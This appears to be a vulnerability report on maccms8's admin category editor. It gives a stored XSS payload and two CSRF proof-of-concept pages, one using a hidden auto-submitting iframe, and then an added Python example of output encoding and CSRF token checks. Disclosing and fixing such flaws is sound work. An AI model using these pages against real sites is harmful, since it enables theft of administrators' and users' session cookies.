
There are CSRF and XSS vulnerabilities in the background, which can be combined to steal user cookies and administrator cookies #2

Closed
@Trepverterless

Description


xss

An XSS vulnerability exists in the backend administrator article management area when adding and modifying a category.
Where the Chinese and English names are entered, enter
" onmousemove=alert(document.cookie) src=x, as in the following figure:
(figure 1)
Move the mouse over the label in the backend article management area and the administrator cookie pops up, as shown in the following figure:
(figure 2)
The user cookie also pops up when the mouse moves over the title on the front page:
(figure 3)


csrf

It is found that CSRF also exists when adding and modifying.
Before use:
(figure 4)
When the following page is constructed, the administrator can be induced to click it:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST">
      <input type="hidden" name="t&#95;id" value="" />
      <input type="hidden" name="flag" value="add" />
      <input type="hidden" name="backurl" value="http&#58;&#47;&#47;localhost&#47;maccms8&#47;safetest&#47;index&#46;php&#63;m&#61;art&#45;type" />
      <input type="hidden" name="t&#95;pid" value="0" />
      <input type="hidden" name="t&#95;name" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;enname" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;tpl" value="art&#95;type&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;list" value="art&#95;list&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;art" value="art&#95;detail&#46;html" />
      <input type="hidden" name="t&#95;key" value="" />
      <input type="hidden" name="t&#95;des" value="" />
      <input type="hidden" name="t&#95;title" value="" />
      <input type="hidden" name="t&#95;sort" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

When the administrator visits and clicks the page:
(figure)

The category is added successfully:
(figure)


csrf+xss

Here, CSRF and XSS can be used together: an attacker can use the CSRF vulnerability to add or modify an article category carrying the code, as in the following page:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Welcome to CSRF</title>
</head>
<body>
<p style="color:blue; text-align:center; font-size:60px;">You're hit by CSRF</p>
<iframe hidden width=1000 height=100 src="#" srcdoc='
<form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST" name="form">
      <input type="hidden" name="t&#95;id" value="" />
      <input type="hidden" name="flag" value="add" />
      <input type="hidden" name="backurl" value="http&#58;&#47;&#47;localhost&#47;maccms8&#47;safetest&#47;index&#46;php&#63;m&#61;art&#45;type" />
      <input type="hidden" name="t&#95;pid" value="0" />
      <input type="hidden" name="t&#95;name" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;enname" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;tpl" value="art&#95;type&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;list" value="art&#95;list&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;art" value="art&#95;detail&#46;html" />
      <input type="hidden" name="t&#95;key" value="" />
      <input type="hidden" name="t&#95;des" value="" />
      <input type="hidden" name="t&#95;title" value="" />
      <input type="hidden" name="t&#95;sort" value="" />
      <input type="submit" value="Submit request" />
    </form>
<script>
// Automatic submission
document.form.submit();
</script>
'></iframe>
</body>
</html>

After the user accesses the link, the hidden iframe automatically submits the form and adds the article category containing the malicious code without the user's knowledge. The malicious code can send the user's cookie to the attacker's remote server, stealing the user's or the administrator's cookie.
(figure)
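The two defects the report chains are a missing output encoding on the category name and a save endpoint that accepts any cross-site POST. The following is an added example written for this page in Python, not code from the maccms8 project or from the reporter; it shows the "before" rendering that lets the reported name string break out of an attribute, the attribute-context encoding that neutralises it, and a per-session CSRF token check (plus an Origin comparison) that rejects a submission like the iframe PoC. The function names, the assumed admin origin `http://localhost` and the sample form dictionaries are all constructed for illustration; only the name string is taken from the report.

```python
import html
import hmac
import secrets
from typing import Optional, Tuple

# Constructed sample input: the category name from the issue text, exactly as the
# unpatched save handler would store it.
REPORTED_NAME = '" onmousemove=alert(document.cookie) src=x'
# Assumed origin of the admin panel for this example.
ADMIN_ORIGIN = "http://localhost"


def render_label_vulnerable(name: str) -> str:
    """Before: the stored name is interpolated into an attribute with no encoding.
    The leading quote in REPORTED_NAME closes the title attribute and the
    onmousemove handler becomes part of the tag, which is what the report shows."""
    return f'<a title="{name}">{name}</a>'


def render_label_fixed(name: str) -> str:
    """After: encode for the attribute context. quote=True turns " into &quot;
    so the value can no longer terminate the attribute or add a new one."""
    safe = html.escape(name, quote=True)
    return f'<a title="{safe}">{safe}</a>'


def issue_csrf_token(session: dict) -> str:
    """Bind a random per-session token that the admin form must echo back."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def csrf_check(session: dict, form: dict, origin: Optional[str]) -> bool:
    """Accept the save only if the posted token matches the session token
    (constant-time compare) and, when the browser sends an Origin header, it
    is the admin panel's own origin. A page on another site cannot read the
    token, and its auto-submitted form carries a foreign Origin."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False
    if origin is not None and origin != ADMIN_ORIGIN:
        return False
    return True


def save_category(session: dict, form: dict,
                  origin: Optional[str]) -> Tuple[bool, Optional[str]]:
    """Hardened save handler: returns (accepted, rendered_label).
    The name is stored as submitted; encoding is applied at render time."""
    if not csrf_check(session, form, origin):
        return False, None
    return True, render_label_fixed(form.get("t_name", ""))


if __name__ == "__main__":
    print(render_label_vulnerable(REPORTED_NAME))
    print(render_label_fixed(REPORTED_NAME))
    session: dict = {}
    token = issue_csrf_token(session)
    # Cross-site submission without the token: rejected.
    print(save_category(session, {"t_name": REPORTED_NAME}, "http://other.example"))
    # Same-origin submission carrying the session token: accepted, label encoded.
    print(save_category(session, {"t_name": REPORTED_NAME, "csrf_token": token}, ADMIN_ORIGIN))
```

Encoding at output time rather than stripping characters on input is deliberate: it keeps legitimate names with quotes intact and covers every place the value is later rendered, including the front-page title the report mentions. The token check stops the forged request before any category is written at all.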
